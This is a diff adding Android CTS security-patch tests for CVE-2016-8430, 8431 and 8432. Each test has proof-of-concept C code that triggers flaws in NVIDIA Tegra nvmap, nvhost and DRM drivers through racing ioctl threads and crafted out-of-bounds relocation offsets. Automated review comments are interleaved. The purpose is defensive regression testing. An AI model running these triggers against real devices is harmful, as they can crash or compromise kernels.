+ usleep(100 * 1000);
+
+ pthread_cond_signal(&cond);
+ usleep(20);
+ while (1) {
+ trigger_nvmap_create();
+ }
+ return 0;
+}
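Review bot: `prepare_data` writes through the `memalign` result without a NULL check, and it prints `errno` after `mprotect` whether or not the call failed, so the "[*] mprotect, error" line can report a stale value from an earlier call. Guard the allocation with `if (!data) exit(1);` and print errno only on failure: `if (mprotect(data, 0x1000, PROT_READ) < 0) printf("[*] mprotect failed, errno = %d\n", errno);`. `NVMAP_HEAP_CARVEOUT_MASK` expands to `NVMAP_HEAP_IOVMM`, which this file never defines; it compiles only because the macro is unused, so either drop it or add the missing definition. `main` ends in `while (1)`, so the trailing `return 0` is unreachable and the binary only stops when something outside it ends the process, which deserves a comment at the top of `main`.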
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8430/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8430/Android.mk
new file mode 100644
index 0000000..839047b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8430/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8430
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8430/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8430/poc.c
new file mode 100644
index 0000000..0717d0b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8430/poc.c
@@ -0,0 +1,204 @@
+/*
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+
+#include <errno.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <dirent.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <sched.h>
+#include <stdlib.h>
+
+struct nvhost_channel_open_args {
+ __s32 channel_fd;
+};
+struct nvhost_set_error_notifier {
+ __u64 offset;
+ __u64 size;
+ __u32 mem;
+ __u32 padding;
+};
+#define NVHOST_IOCTL_MAGIC 'H'
+#define NVHOST_IOCTL_CHANNEL_OPEN \
+ _IOR(NVHOST_IOCTL_MAGIC, 112, struct nvhost_channel_open_args)
+#define NVHOST_IOCTL_CHANNEL_SET_ERROR_NOTIFIER \
+ _IOWR(NVHOST_IOCTL_MAGIC, 111, struct nvhost_set_error_notifier)
+struct nvmap_create_handle {
+ union {
+ __u32 id; /* FromId */
+ __u32 size; /* CreateHandle */
+ __s32 fd; /* DmaBufFd or FromFd */
+ };
+ __u32 handle; /* returns nvmap handle */
+};
+struct nvmap_alloc_handle {
+ __u32 handle; /* nvmap handle */
+ __u32 heap_mask; /* heaps to allocate from */
+ __u32 flags; /* wb/wc/uc/iwb etc. */
+ __u32 align; /* min alignment necessary */
+};
+#define NVMAP_HEAP_CARVEOUT_IRAM (1ul<<29)
+#define NVMAP_HEAP_CARVEOUT_VPR (1ul<<28)
+#define NVMAP_HEAP_CARVEOUT_TSEC (1ul<<27)
+#define NVMAP_HEAP_CARVEOUT_GENERIC (1ul<<0)
+
+#define NVMAP_HEAP_CARVEOUT_MASK (NVMAP_HEAP_IOVMM - 1)
+
+/* allocation flags */
+#define NVMAP_HANDLE_UNCACHEABLE (0x0ul << 0)
+#define NVMAP_HANDLE_WRITE_COMBINE (0x1ul << 0)
+#define NVMAP_HANDLE_INNER_CACHEABLE (0x2ul << 0)
+#define NVMAP_HANDLE_CACHEABLE (0x3ul << 0)
+#define NVMAP_HANDLE_CACHE_FLAG (0x3ul << 0)
+
+#define NVMAP_HANDLE_SECURE (0x1ul << 2)
+#define NVMAP_HANDLE_KIND_SPECIFIED (0x1ul << 3)
+#define NVMAP_HANDLE_COMPR_SPECIFIED (0x1ul << 4)
+#define NVMAP_HANDLE_ZEROED_PAGES (0x1ul << 5)
+#define NVMAP_HANDLE_PHYS_CONTIG (0x1ul << 6)
+#define NVMAP_HANDLE_CACHE_SYNC (0x1ul << 7)
+#define NVMAP_IOC_MAGIC 'N'
+
+/* Creates a new memory handle. On input, the argument is the size of the new
+ * handle; on return, the argument is the name of the new handle
+ */
+ #define NVMAP_IOC_ALLOC _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
+#define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
+#define NVMAP_IOC_FREE _IO(NVMAP_IOC_MAGIC, 4)
+int g_fd = -1;
+int g_nvmap_fd = -1;
+static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
+static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
+int g_channel_fd = -1;
+struct nvhost_set_error_notifier g_error_notifier;
+struct nvmap_create_handle g_nvmap_hdl;
+
+struct nvmap_alloc_handle g_real_alloc = {0};
+
+int open_driver() {
+ char* dev_path = "/dev/nvhost-vic";
+ g_fd = open(dev_path, O_RDONLY);
+ if (g_fd < 0) {
+ printf("open file(%s) failed, errno=%d\n", dev_path, errno);
+ return -1;
+ } else {
+ printf("open file(%s) succ!\n", dev_path);
+ }
+
+ dev_path = "/dev/nvmap";
+ g_nvmap_fd = open(dev_path, O_RDONLY);
+ if (g_nvmap_fd < 0) {
+ printf("open file(%s) failed, errno=%d\n", dev_path, errno);
+ return -1;
+ } else {
+ printf("open file(%s) succ!\n", dev_path);
+ }
+ return 1;
+}
+
+void trigger_channel_open() {
+ struct nvhost_channel_open_args args = {-1};
+ ioctl(g_fd, NVHOST_IOCTL_CHANNEL_OPEN, &args);
+ g_channel_fd = args.channel_fd;
+}
+
+int trigger_nvmap_create() {
+ g_nvmap_hdl.size = 0x1000;
+ ioctl(g_nvmap_fd, NVMAP_IOC_CREATE, &g_nvmap_hdl);
+ return g_nvmap_hdl.handle;
+}
+
+void trigger_nvmap_free() {
+ int data = g_nvmap_hdl.handle;
+ ioctl(g_nvmap_fd, NVMAP_IOC_FREE, data);
+}
+void trigger_nvmap_alloc(int handle) {
+ g_real_alloc.align = 0x1000;
+ g_real_alloc.heap_mask = NVMAP_HEAP_CARVEOUT_GENERIC;
+ g_real_alloc.flags = NVMAP_HANDLE_ZEROED_PAGES;
+ g_real_alloc.handle = handle;
+ ioctl(g_nvmap_fd, NVMAP_IOC_ALLOC, &g_real_alloc);
+}
+void prepare_data() {
+ g_error_notifier.offset = 0;
+ g_error_notifier.mem = g_nvmap_hdl.handle;
+}
+
+void trigger_set_error_notifier() {
+ ioctl(g_fd, NVHOST_IOCTL_CHANNEL_SET_ERROR_NOTIFIER, &g_error_notifier);
+}
+
+void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
+ setpriority(PRIO_PROCESS, gettid(), privi);
+
+ /* bind process to a CPU*/
+ if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) {
+ }
+}
+
+void* race_thread(void* arg) {
+ setup_privi_and_affinity(-19, 2);
+ pthread_mutex_lock(&mutex);
+ pthread_cond_wait(&cond, &mutex);
+ pthread_mutex_unlock(&mutex);
+ while (1) {
+ trigger_set_error_notifier();
+ }
+ return NULL;
+}
+
+void* race_thread_2(void* arg) {
+ setup_privi_and_affinity(-19, 1);
+ pthread_mutex_lock(&mutex);
+ pthread_cond_wait(&cond, &mutex);
+ pthread_mutex_unlock(&mutex);
+ while (1) {
+ trigger_set_error_notifier();
+ }
+ return NULL;
+}
+
+int main(int argc, char**argv) {
+ setup_privi_and_affinity(0, 1);
+ if (open_driver() < 0) {
+ return -1;
+ }
+ //trigger_nvmap_create();
+ trigger_nvmap_alloc(trigger_nvmap_create());
+ prepare_data();
+ //trigger_nvmap_free();
+ pthread_t tid;
+ pthread_create(&tid, NULL, race_thread, NULL);
+ pthread_create(&tid, NULL, race_thread_2, NULL);
+ usleep(100 * 1000);
+ pthread_cond_broadcast(&cond);
+
+ sleep(100);
+ return 0;
+}
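Review bot: `trigger_nvmap_create` returns `g_nvmap_hdl.handle` without checking the `ioctl` result, so a failed `NVMAP_IOC_CREATE` passes the zero-initialised global handle on to `trigger_nvmap_alloc` and the run continues as if setup had worked. A test binary that cannot tell "setup failed" from "ran to completion" can report a device as fine when the code path was never exercised. Use `if (ioctl(g_nvmap_fd, NVMAP_IOC_CREATE, &g_nvmap_hdl) < 0) return -1;` and have `main` exit non-zero on a negative handle. Separately, the comment "Creates a new memory handle…" sits above `NVMAP_IOC_ALLOC` but describes `NVMAP_IOC_CREATE`. `race_thread` and `race_thread_2` differ only in the CPU mask, which could be passed through `arg` instead.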
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8431/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8431/Android.mk
new file mode 100644
index 0000000..d0ef823
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8431/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8431
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8431/local_poc.h b/hostsidetests/security/securityPatch/CVE-2016-8431/local_poc.h
new file mode 100644
index 0000000..c74db80
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8431/local_poc.h
@@ -0,0 +1,245 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#ifndef __LOCAL_POC_H__
+#define __LOCAL_POC_H__
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_TEGRA_GEM_CREATE 0x00
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+#define DRM_TEGRA_SUBMIT 0x08
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ __u64 context;
+};
+
+struct drm_tegra_cmdbuf {
+ __u32 handle;
+ __u32 offset;
+ __u32 words;
+ __u32 pad;
+};
+
+struct host1x_waitchk {
+ struct host1x_bo *bo;
+ __u32 offset;
+ __u32 syncpt_id;
+ __u32 thresh;
+};
+
+struct drm_tegra_waitchk {
+ __u32 handle;
+ __u32 offset;
+ __u32 syncpt;
+ __u32 thresh;
+};
+
+struct drm_tegra_submit {
+ __u64 context;
+ __u32 num_syncpts;
+ __u32 num_cmdbufs;
+ __u32 num_relocs;
+ __u32 num_waitchks;
+ __u32 waitchk_mask;
+ __u32 timeout;
+ __u64 syncpts;
+ __u64 cmdbufs;
+ __u64 relocs;
+ __u64 waitchks;
+ __u32 fence; /* Return value */
+ __u32 reserved0;
+ __u64 fences;
+ __u32 reserved1[2]; /* future expansion */
+};
+
+struct drm_tegra_gem_create {
+ __u64 size;
+ __u32 flags;
+ __u32 handle;
+};
+
+struct drm_gem_close {
+ __u32 handle;
+ __u32 pad;
+};
+
+struct drm_mode_map_dumb {
+ __u32 handle;
+ __u32 pad;
+ __u64 offset;
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+#define DRM_IOW(nr,type) _IOW(DRM_IOCTL_BASE,nr,type)
+
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_SUBMIT DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_SUBMIT, struct drm_tegra_submit)
+#define DRM_IOCTL_TEGRA_GEM_CREATE DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_GEM_CREATE, struct drm_tegra_gem_create)
+#define DRM_IOCTL_GEM_CLOSE DRM_IOW (0x09, struct drm_gem_close)
+#define DRM_IOCTL_MODE_MAP_DUMB DRM_IOWR(0xB3, struct drm_mode_map_dumb)
+
+struct drm_tegra_syncpt {
+ __u32 id;
+ __u32 incrs;
+};
+
+struct list_head {
+ struct list_head *next, *prev;
+};
+
+struct kobject {
+ const char *name;
+ struct list_head entry;
+ struct kobject *parent;
+ void *kset;
+ void *ktype;
+ void *sd;
+ unsigned long refcount;
+ unsigned int state_initialized:1;
+ unsigned int state_in_sysfs:1;
+ unsigned int state_add_uevent_sent:1;
+ unsigned int state_remove_uevent_sent:1;
+ unsigned int uevent_suppress:1;
+};
+
+struct device {
+ struct device *parent;
+ void *p;
+ void* pad0[8];
+ char *init_name;
+ void *type;
+ void* pad1[5];
+ void *bus;
+ void *driver;
+ void *platform_data;
+ void *driver_data;
+};
+
+struct host1x_info {
+ int nb_channels;
+ int nb_pts;
+ int nb_bases;
+ int nb_mlocks;
+ int (*init)(void *);
+ int sync_offset;
+};
+
+struct host1x_syncpt_ops {
+ void (*restore)(void *syncpt);
+ void (*restore_wait_base)(void *syncpt);
+ void (*load_wait_base)(void *syncpt);
+ __u32 (*load)(void *syncpt);
+ int (*cpu_incr)(void *syncpt);
+ int (*patch_wait)(void *syncpt, void *patch_addr);
+};
+
+struct host1x {
+ struct host1x_info *info;
+ void *regs;
+ void *syncpt;
+ void *bases;
+ struct device *dev;
+ void *clk;
+ void *clk_actmon;
+ void* pad[5];
+ void *intr_wq;
+ int intr_syncpt_irq;
+ int intr_general_irq;
+ __u32 intstatus;
+ void (*host_isr[32])(__u32, void *);
+ void *host_isr_priv[32];
+ struct host1x_syncpt_ops *syncpt_op;
+ void *intr_op;
+ void *channel_op;
+ void *cdma_op;
+ void *cdma_pb_op;
+ void *actmon_op;
+ void *debug_op;
+};
+
+struct host1x_client {
+ struct list_head list;
+ void *parent;
+ struct device *dev;
+ void *ops;
+};
+
+struct tegra_drm_client_ops {
+ void* open_channel;
+ void* close_channel;
+ void* reset;
+ void* is_add_reg;
+ void* submit;
+};
+
+struct tegra_drm_client {
+ unsigned char pad[232];
+ struct list_head list;
+ struct tegra_drm_client_ops *ops;
+};
+
+struct tegra_drm_context {
+ struct tegra_drm_client *client;
+ void *channel;
+ struct list_head list;
+};
+
+struct drm_tegra_reloc {
+ struct {
+ __u32 handle;
+ __u32 offset;
+ } cmdbuf;
+ struct {
+ __u32 handle;
+ __u32 offset;
+ } target;
+ __u32 shift;
+ __u32 pad;
+};
+
+#endif
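Review bot: This header is not self-contained: it uses `__u32`, `__u64`, `__s32`-style kernel types and `_IOWR`/`_IOW` without including anything, so it compiles only if the including file happens to pull those in first. Add `#include <linux/types.h>` and `#include <linux/ioctl.h>` directly under the include guard. The wireless-extension constants at the top (`SIOCIWFIRSTPRIV`, `PRIV_CMD_*`) and the hand-copied `struct device`, `struct kobject` and `struct host1x` layouts are not referenced by the poc.c added next to it and could be dropped. The guard name `__LOCAL_POC_H__` uses a reserved identifier; `LOCAL_POC_H` would do. The identical blob (index c74db80) is added again under CVE-2016-8432, so a single shared header would avoid the two copies drifting apart.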
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8431/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8431/poc.c
new file mode 100644
index 0000000..1cc0f29
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8431/poc.c
@@ -0,0 +1,91 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <unistd.h>
+#include <stdio.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <sys/ioctl.h>
+
+#include "local_poc.h"
+
+#define LOG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
+#define ERR(fmt, ...) printf(fmt " %d %s\n", ##__VA_ARGS__, errno, strerror(errno))
+
+#define DEV "/dev/dri/renderD129"
+#define CMD_NUM 1
+
+int dev_fd;
+
+volatile struct drm_tegra_open_channel open_c;
+volatile struct drm_tegra_submit submit_c;
+volatile struct drm_tegra_gem_create gem_create;
+
+struct drm_tegra_cmdbuf cmdbufs[CMD_NUM];
+struct drm_tegra_syncpt syncpt;
+struct drm_tegra_reloc relocs[CMD_NUM];
+
+static int prepare()
+{
+ open_c.client = HOST1X_CLASS_VIC;
+ submit_c.num_syncpts = 1;
+ submit_c.syncpts = (__u64)&syncpt;
+ submit_c.num_cmdbufs = CMD_NUM;
+ submit_c.cmdbufs = (__u64)cmdbufs;
+ submit_c.num_relocs = CMD_NUM;
+ submit_c.relocs = (__u64)relocs;
+ gem_create.size = PAGE_SIZE;
+ return 0;
+}
+
+int main()
+{
+ int ret;
+ int i;
+
+ dev_fd = open(DEV,O_RDONLY);
+ if(dev_fd == -1){
+ return 0;
+ }
+
+ prepare();
+
+ ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret == -1){
+ goto out_dev;
+ }
+
+ submit_c.context = open_c.context;
+
+ ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_GEM_CREATE, &gem_create);
+ if(ret == 0){
+ for(i = 0; i < CMD_NUM; i++){
+ cmdbufs[i].words = 0;
+ cmdbufs[i].offset = 0;
+ cmdbufs[i].handle = gem_create.handle;
+ relocs[i].cmdbuf.handle = gem_create.handle;
+ relocs[i].cmdbuf.offset = 8192;
+ relocs[i].target.handle = gem_create.handle;
+ relocs[i].target.offset = 8192;
+ }
+ ioctl(dev_fd, DRM_IOCTL_TEGRA_SUBMIT, &submit_c);
+ }else{
+ }
+
+out_dev:
+ close(dev_fd);
+ return 0;
+}
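Review bot: In `prepare`, the casts `(__u64)&syncpt`, `(__u64)cmdbufs` and `(__u64)relocs` convert a pointer straight to a 64-bit integer, and the module is built with `LOCAL_MULTILIB := both`. On the 32-bit build that is a pointer-to-wider-integer conversion, which GCC documents as sign-extending, so a high address would arrive in the submit struct with the upper word set. Go through `uintptr_t`, e.g. `submit_c.syncpts = (__u64)(uintptr_t)&syncpt;` and likewise for the other two, with `<stdint.h>` included. The same cast is visible in the `prepare` of CVE-2016-8432/poc.c. Also, `ERR` expands to `strerror` but `<string.h>` is not included, and every path in `main` returns 0, so the exit status cannot distinguish a missing device node from a completed run.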
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8432/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8432/Android.mk
new file mode 100644
index 0000000..614d20b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8432/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8432
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8432/local_poc.h b/hostsidetests/security/securityPatch/CVE-2016-8432/local_poc.h
new file mode 100644
index 0000000..c74db80
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8432/local_poc.h
@@ -0,0 +1,245 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#ifndef __LOCAL_POC_H__
+#define __LOCAL_POC_H__
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_TEGRA_GEM_CREATE 0x00
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+#define DRM_TEGRA_SUBMIT 0x08
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ __u64 context;
+};
+
+struct drm_tegra_cmdbuf {
+ __u32 handle;
+ __u32 offset;
+ __u32 words;
+ __u32 pad;
+};
+
+struct host1x_waitchk {
+ struct host1x_bo *bo;
+ __u32 offset;
+ __u32 syncpt_id;
+ __u32 thresh;
+};
+
+struct drm_tegra_waitchk {
+ __u32 handle;
+ __u32 offset;
+ __u32 syncpt;
+ __u32 thresh;
+};
+
+struct drm_tegra_submit {
+ __u64 context;
+ __u32 num_syncpts;
+ __u32 num_cmdbufs;
+ __u32 num_relocs;
+ __u32 num_waitchks;
+ __u32 waitchk_mask;
+ __u32 timeout;
+ __u64 syncpts;
+ __u64 cmdbufs;
+ __u64 relocs;
+ __u64 waitchks;
+ __u32 fence; /* Return value */
+ __u32 reserved0;
+ __u64 fences;
+ __u32 reserved1[2]; /* future expansion */
+};
+
+struct drm_tegra_gem_create {
+ __u64 size;
+ __u32 flags;
+ __u32 handle;
+};
+
+struct drm_gem_close {
+ __u32 handle;
+ __u32 pad;
+};
+
+struct drm_mode_map_dumb {
+ __u32 handle;
+ __u32 pad;
+ __u64 offset;
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+#define DRM_IOW(nr,type) _IOW(DRM_IOCTL_BASE,nr,type)
+
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_SUBMIT DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_SUBMIT, struct drm_tegra_submit)
+#define DRM_IOCTL_TEGRA_GEM_CREATE DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_GEM_CREATE, struct drm_tegra_gem_create)
+#define DRM_IOCTL_GEM_CLOSE DRM_IOW (0x09, struct drm_gem_close)
+#define DRM_IOCTL_MODE_MAP_DUMB DRM_IOWR(0xB3, struct drm_mode_map_dumb)
+
+struct drm_tegra_syncpt {
+ __u32 id;
+ __u32 incrs;
+};
+
+struct list_head {
+ struct list_head *next, *prev;
+};
+
+struct kobject {
+ const char *name;
+ struct list_head entry;
+ struct kobject *parent;
+ void *kset;
+ void *ktype;
+ void *sd;
+ unsigned long refcount;
+ unsigned int state_initialized:1;
